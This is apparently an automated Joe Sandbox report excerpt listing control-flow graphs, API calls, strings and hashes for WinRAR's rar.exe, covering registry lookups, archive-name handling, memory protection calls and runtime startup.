728->722 733 7ff6bbcf4519-7ff6bbcf4523 728->733 730->728 730->731 736 7ff6bbcf4214-7ff6bbcf425c 731->736 737 7ff6bbcf43d0-7ff6bbcf43e0 call 7ff6bbcfa580 731->737 734 7ff6bbcf4585-7ff6bbcf4589 733->734 735 7ff6bbcf4525-7ff6bbcf452b 733->735 743 7ff6bbcf45a3-7ff6bbcf45d4 call 7ff6bbcf3884 734->743 744 7ff6bbcf458b-7ff6bbcf458f 734->744 739 7ff6bbcf4531-7ff6bbcf4539 735->739 740 7ff6bbcf45db-7ff6bbcf45de 735->740 741 7ff6bbcf4261-7ff6bbcf4264 736->741 760 7ff6bbcf44f0-7ff6bbcf4503 737->760 761 7ff6bbcf43e6-7ff6bbcf4414 call 7ff6bbcfa9e8 call 7ff6bbd1172c 737->761 747 7ff6bbcf4573-7ff6bbcf457a 739->747 748 7ff6bbcf453b-7ff6bbcf453e 739->748 740->722 749 7ff6bbcf45e0-7ff6bbcf45e5 740->749 750 7ff6bbcf4268-7ff6bbcf4270 741->750 743->740 744->743 752 7ff6bbcf4591-7ff6bbcf4597 744->752 762 7ff6bbcf457e-7ff6bbcf4583 747->762 757 7ff6bbcf4540-7ff6bbcf4543 748->757 758 7ff6bbcf456a-7ff6bbcf4571 748->758 749->724 750->750 759 7ff6bbcf4272-7ff6bbcf4288 call 7ff6bbd11700 750->759 752->740 763 7ff6bbcf4599-7ff6bbcf45a1 752->763 754->652 755->754 765 7ff6bbcf4545-7ff6bbcf4548 757->765 766 7ff6bbcf4561-7ff6bbcf4568 757->766 758->762 779 7ff6bbcf42a3 759->779 780 7ff6bbcf428a-7ff6bbcf4295 759->780 760->728 761->760 787 7ff6bbcf441a-7ff6bbcf44a9 call 7ff6bbcfd840 call 7ff6bbcfa900 call 7ff6bbcfa8c4 call 7ff6bbcfa900 call 7ff6bbd115fc 761->787 762->740 763->740 771 7ff6bbcf454a-7ff6bbcf454d 765->771 772 7ff6bbcf4558-7ff6bbcf455f 765->772 766->762 771->752 777 7ff6bbcf454f-7ff6bbcf4556 771->777 772->762 777->762 786 7ff6bbcf42a7-7ff6bbcf42be 779->786 780->779 784 7ff6bbcf4297-7ff6bbcf42a1 780->784 784->786 786->741 788 7ff6bbcf42c0-7ff6bbcf42c2 786->788 823 7ff6bbcf44bf-7ff6bbcf44cf 787->823 824 7ff6bbcf44ab-7ff6bbcf44bb 787->824 790 7ff6bbcf42c4-7ff6bbcf42d6 call 7ff6bbcfa900 788->790 791 7ff6bbcf42e6 788->791 796 7ff6bbcf42db-7ff6bbcf42e1 790->796 791->737 793 7ff6bbcf42ec 791->793 797 7ff6bbcf42f1-7ff6bbcf42f7 793->797 799 7ff6bbcf45d6 796->799 800 7ff6bbcf4300-7ff6bbcf4303 797->800 801 7ff6bbcf42f9-7ff6bbcf42fe 797->801 799->740 800->797 801->800 803 7ff6bbcf4305-7ff6bbcf4314 801->803 805 7ff6bbcf433d-7ff6bbcf4347 803->805 806 7ff6bbcf4316-7ff6bbcf4320 803->806 809 7ff6bbcf434d-7ff6bbcf4378 call 7ff6bbcfd840 805->809 810 7ff6bbcf45ea-7ff6bbcf45ef call 7ff6bbd0a774 805->810 808 7ff6bbcf4323-7ff6bbcf4327 806->808 808->805 813 7ff6bbcf4329-7ff6bbcf433b 808->813 819 7ff6bbcf439e-7ff6bbcf43cb call 7ff6bbcf470c 809->819 820 7ff6bbcf437a-7ff6bbcf4399 call 7ff6bbd11764 809->820 810->722 813->805 813->808 819->796 820->796 827 7ff6bbcf44d2-7ff6bbcf44d8 823->827 824->823 828 7ff6bbcf44da-7ff6bbcf44e5 827->828 829 7ff6bbcf44eb-7ff6bbcf44ee 827->829 828->799 828->829 829->827
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileModuleNamesnprintfwcschr
                                                                                                                                                                                                                              • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
                                                                                                                                                                                                                              • API String ID: 602362809-1645646101
                                                                                                                                                                                                                              • Opcode ID: 13040d61f0e7da43208126d1082a5dded3eea02b21a4f98514b48b8c6faaa874
                                                                                                                                                                                                                              • Instruction ID: 74140f271701fcdc43a7cce94e5f849dfcbb68171f9b5d2378e1493f89f2ac6c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13040d61f0e7da43208126d1082a5dded3eea02b21a4f98514b48b8c6faaa874
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E22BF22A1868295EB24DB1DD4982F96371FF48784F805136EB5EC7AE9EF3CE548C340

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1405 7ff6bbcc4fd0-7ff6bbcc502d call 7ff6bbd0a5a0 1408 7ff6bbcc502f-7ff6bbcc5037 1405->1408 1409 7ff6bbcc504d-7ff6bbcc5055 1405->1409 1408->1409 1410 7ff6bbcc5039-7ff6bbcc504b call 7ff6bbd0c8a0 1408->1410 1411 7ff6bbcc506e-7ff6bbcc5089 call 7ff6bbce420c 1409->1411 1412 7ff6bbcc5057-7ff6bbcc5069 call 7ff6bbcc481c 1409->1412 1410->1409 1410->1412 1418 7ff6bbcc509f-7ff6bbcc50b6 call 7ff6bbcfdb08 1411->1418 1419 7ff6bbcc508b-7ff6bbcc509d call 7ff6bbcfa9c0 1411->1419 1412->1411 1424 7ff6bbcc511b-7ff6bbcc5131 call 7ff6bbd0c8a0 1418->1424 1425 7ff6bbcc50b8-7ff6bbcc50c3 call 7ff6bbcfa59c 1418->1425 1419->1424 1430 7ff6bbcc5203-7ff6bbcc520d call 7ff6bbcfaa48 1424->1430 1431 7ff6bbcc5137-7ff6bbcc513e 1424->1431 1425->1424 1432 7ff6bbcc50c5-7ff6bbcc50cf call 7ff6bbcd3054 1425->1432 1440 7ff6bbcc5212-7ff6bbcc521c 1430->1440 1433 7ff6bbcc5140-7ff6bbcc5167 call 7ff6bbce3f98 1431->1433 1434 7ff6bbcc516c-7ff6bbcc51be call 7ff6bbcfaa1c call 7ff6bbcfaa48 call 7ff6bbcf6e98 1431->1434 1432->1424 1441 7ff6bbcc50d1-7ff6bbcc5107 call 7ff6bbcfa9e8 call 7ff6bbcfa9c0 call 7ff6bbcd3054 1432->1441 1433->1434 1489 7ff6bbcc51d3-7ff6bbcc51e8 call 7ff6bbcf7a24 1434->1489 1443 7ff6bbcc5222 1440->1443 1444 7ff6bbcc52db-7ff6bbcc52e0 1440->1444 1441->1424 1515 7ff6bbcc5109-7ff6bbcc5116 call 7ff6bbcfa9e8 1441->1515 1449 7ff6bbcc532f-7ff6bbcc5332 1443->1449 1450 7ff6bbcc5228-7ff6bbcc522d 1443->1450 1445 7ff6bbcc5453-7ff6bbcc5477 call 7ff6bbccf00c call 7ff6bbccf230 call 7ff6bbccf09c 1444->1445 1446 7ff6bbcc52e6-7ff6bbcc52e9 1444->1446 1506 7ff6bbcc547c-7ff6bbcc5483 1445->1506 1454 7ff6bbcc52ef-7ff6bbcc52f2 1446->1454 1455 7ff6bbcc5379-7ff6bbcc5382 1446->1455 1452 7ff6bbcc5334 1449->1452 1453 7ff6bbcc533b-7ff6bbcc533e 1449->1453 1450->1449 1458 7ff6bbcc5233-7ff6bbcc5236 1450->1458 1452->1453 1462 7ff6bbcc5340 1453->1462 1463 7ff6bbcc5347-7ff6bbcc5358 call 7ff6bbcb1230 call 7ff6bbcb4858 1453->1463 1464 7ff6bbcc52f4-7ff6bbcc52f7 1454->1464 1465 7ff6bbcc536c-7ff6bbcc5374 call 7ff6bbcf81cc 1454->1465 1460 7ff6bbcc5449-7ff6bbcc5451 call 7ff6bbceeab8 1455->1460 1461 7ff6bbcc5388-7ff6bbcc538b 1455->1461 1468 7ff6bbcc5290-7ff6bbcc5299 1458->1468 1469 7ff6bbcc5238-7ff6bbcc523b 1458->1469 1460->1506 1475 7ff6bbcc5391-7ff6bbcc5397 1461->1475 1476 7ff6bbcc541b-7ff6bbcc5433 call 7ff6bbcfab1c 1461->1476 1462->1463 1523 7ff6bbcc535d 1463->1523 1464->1445 1478 7ff6bbcc52fd-7ff6bbcc5300 1464->1478 1465->1506 1480 7ff6bbcc52b2-7ff6bbcc52bd 1468->1480 1481 7ff6bbcc529b-7ff6bbcc529e 1468->1481 1470 7ff6bbcc5274-7ff6bbcc528b call 7ff6bbcb1230 call 7ff6bbcb48ec 1469->1470 1471 7ff6bbcc523d-7ff6bbcc5240 1469->1471 1540 7ff6bbcc535e-7ff6bbcc5362 call 7ff6bbcb14fc 1470->1540 1471->1445 1483 7ff6bbcc5246-7ff6bbcc5249 1471->1483 1494 7ff6bbcc5399-7ff6bbcc539c 1475->1494 1495 7ff6bbcc540c-7ff6bbcc5419 call 7ff6bbce54f8 call 7ff6bbce51e4 1475->1495 1476->1506 1522 7ff6bbcc5435-7ff6bbcc5447 call 7ff6bbcebbd4 1476->1522 1478->1449 1496 7ff6bbcc5302-7ff6bbcc5305 1478->1496 1488 7ff6bbcc52ce-7ff6bbcc52d6 call 7ff6bbce55e0 1480->1488 1491 7ff6bbcc52bf-7ff6bbcc52c9 call 7ff6bbcfa9e8 1480->1491 1487 7ff6bbcc52a0-7ff6bbcc52a6 1481->1487 1481->1488 1483->1449 1498 7ff6bbcc524f-7ff6bbcc5252 1483->1498 1503 7ff6bbcc5313-7ff6bbcc531d call 7ff6bbcc481c 1487->1503 1504 7ff6bbcc52a8-7ff6bbcc52ad call 7ff6bbcc7214 1487->1504 1488->1506 1542 7ff6bbcc51c0-7ff6bbcc51ce call 7ff6bbcfaa48 1489->1542 1543 7ff6bbcc51ea-7ff6bbcc5201 call 7ff6bbcf6f68 call 7ff6bbcb14c0 1489->1543 1491->1488 1510 7ff6bbcc53ef-7ff6bbcc5401 call 7ff6bbcc45c8 1494->1510 1511 7ff6bbcc539e-7ff6bbcc53a1 1494->1511 1495->1506 1512 7ff6bbcc5322-7ff6bbcc532a call 7ff6bbcd67e0 1496->1512 1513 7ff6bbcc5307-7ff6bbcc530a 1496->1513 1498->1445 1517 7ff6bbcc5258-7ff6bbcc525b 1498->1517 1503->1506 1504->1506 1528 7ff6bbcc5491-7ff6bbcc54bc call 7ff6bbd0a610 1506->1528 1529 7ff6bbcc5485-7ff6bbcc548c call 7ff6bbcc8444 1506->1529 1510->1495 1511->1503 1527 7ff6bbcc53a7-7ff6bbcc53d5 call 7ff6bbcc45c8 call 7ff6bbcfab1c 1511->1527 1512->1506 1513->1445 1530 7ff6bbcc5310 1513->1530 1515->1424 1533 7ff6bbcc525d-7ff6bbcc5260 1517->1533 1534 7ff6bbcc526b-7ff6bbcc5272 1517->1534 1522->1506 1523->1540 1527->1506 1561 7ff6bbcc53db-7ff6bbcc53ea call 7ff6bbceba9c 1527->1561 1529->1528 1530->1503 1533->1512 1547 7ff6bbcc5266 1533->1547 1534->1488 1555 7ff6bbcc5367 1540->1555 1542->1489 1543->1440 1547->1530 1555->1506 1561->1506
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcschr
                                                                                                                                                                                                                              • String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
                                                                                                                                                                                                                              • API String ID: 1497570035-1281034975
                                                                                                                                                                                                                              • Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                                                                              • Instruction ID: 5afc33fd9268111ca1f2966b992b39e119640949a8eec9e1450693185fcb3170
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47C17461A1858295EA24EF2DC85A1FC12B1BF6D785F485131EB4ECA5FADF2CEA04C350

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1564 7ff6bbcf7f24-7ff6bbcf7f5c 1565 7ff6bbcf7fd0 1564->1565 1566 7ff6bbcf7f5e-7ff6bbcf7f64 1564->1566 1567 7ff6bbcf7fd7-7ff6bbcf7fea 1565->1567 1566->1565 1568 7ff6bbcf7f66-7ff6bbcf7f7c call 7ff6bbcfb3f0 1566->1568 1569 7ff6bbcf7fec-7ff6bbcf7fef 1567->1569 1570 7ff6bbcf8036-7ff6bbcf8039 1567->1570 1578 7ff6bbcf7fb5 1568->1578 1579 7ff6bbcf7f7e-7ff6bbcf7fb3 GetProcAddressForCaller GetProcAddress 1568->1579 1572 7ff6bbcf805c-7ff6bbcf8065 GetCurrentProcessId 1569->1572 1574 7ff6bbcf7ff1-7ff6bbcf8000 1569->1574 1570->1572 1573 7ff6bbcf803b-7ff6bbcf804a 1570->1573 1576 7ff6bbcf8077-7ff6bbcf8093 1572->1576 1577 7ff6bbcf8067 1572->1577 1584 7ff6bbcf804f-7ff6bbcf8051 1573->1584 1585 7ff6bbcf8005-7ff6bbcf8007 1574->1585 1583 7ff6bbcf8069-7ff6bbcf8075 1577->1583 1580 7ff6bbcf7fbc-7ff6bbcf7fce 1578->1580 1579->1580 1580->1567 1583->1576 1583->1583 1584->1576 1586 7ff6bbcf8053-7ff6bbcf805a 1584->1586 1585->1576 1587 7ff6bbcf8009 1585->1587 1588 7ff6bbcf8010-7ff6bbcf8034 call 7ff6bbccca6c call 7ff6bbcccda4 call 7ff6bbccca40 1586->1588 1587->1588 1588->1576
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                                                                                                                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                                                                                                                              • API String ID: 1389829785-2207617598
                                                                                                                                                                                                                              • Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                              • Instruction ID: 2b5f33991c8c405695d4886794a70ca6083febfcc2164ac28000856a9985909e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36418B21A08B8381FA09CB1EA81853967A0BF4CBD4F481271CF5D877B5DF7CE08A8308

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 552178382-0
                                                                                                                                                                                                                              • Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                              • Instruction ID: a13acdddf086cd308f5056e175d381c477dd2c2ca3d0f824494aad605f07ef90
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B311721E0C68385EA1CAB2DA4653BD1792BF5D784F844734EB0D8B2F7DE2CA8048751

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF6BBCF495D,?,?,?,00007FF6BBCE7E7D), ref: 00007FF6BBCF47DB
                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF6BBCF495D,?,?,?,00007FF6BBCE7E7D), ref: 00007FF6BBCF4831
                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF6BBCF495D,?,?,?,00007FF6BBCE7E7D), ref: 00007FF6BBCF4853
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF6BBCF495D,?,?,?,00007FF6BBCE7E7D), ref: 00007FF6BBCF48A6
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseEnvironmentExpandOpenQueryStringsValue
                                                                                                                                                                                                                              • String ID: LanguageFolder$Software\WinRAR\General
                                                                                                                                                                                                                              • API String ID: 1800380464-3408810217
                                                                                                                                                                                                                              • Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                                                                              • Instruction ID: 4d14c7f6bbdb94066b04607de1be3041b286758c35ab9694717643926ebfcf45
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B131B422718A8185EB64DB29E8542FEA361FF88794F405231EF4D87BE9EF6CD148C700

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF6BBCE38CB,?,?,?,00007FF6BBCE41EC), ref: 00007FF6BBCE43D1
                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6BBCE38CB,?,?,?,00007FF6BBCE41EC), ref: 00007FF6BBCE4402
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6BBCE38CB,?,?,?,00007FF6BBCE41EC), ref: 00007FF6BBCE440D
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF6BBCE38CB,?,?,?,00007FF6BBCE41EC), ref: 00007FF6BBCE443E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseFileModuleNameOpenQueryValue
                                                                                                                                                                                                                              • String ID: AppData$Software\WinRAR\Paths
                                                                                                                                                                                                                              • API String ID: 3617018055-3415417297
                                                                                                                                                                                                                              • Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                              • Instruction ID: edaf40955691f393d379f96b60992621fb42de42d0d766686fda5fe4f957d4c9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51116022A2878286EA159F2AE4155ADB360FF8CBC4F445231EB4E87B69DF3CE504C710

                                                                                                                                                                                                                              Control-flow Graph

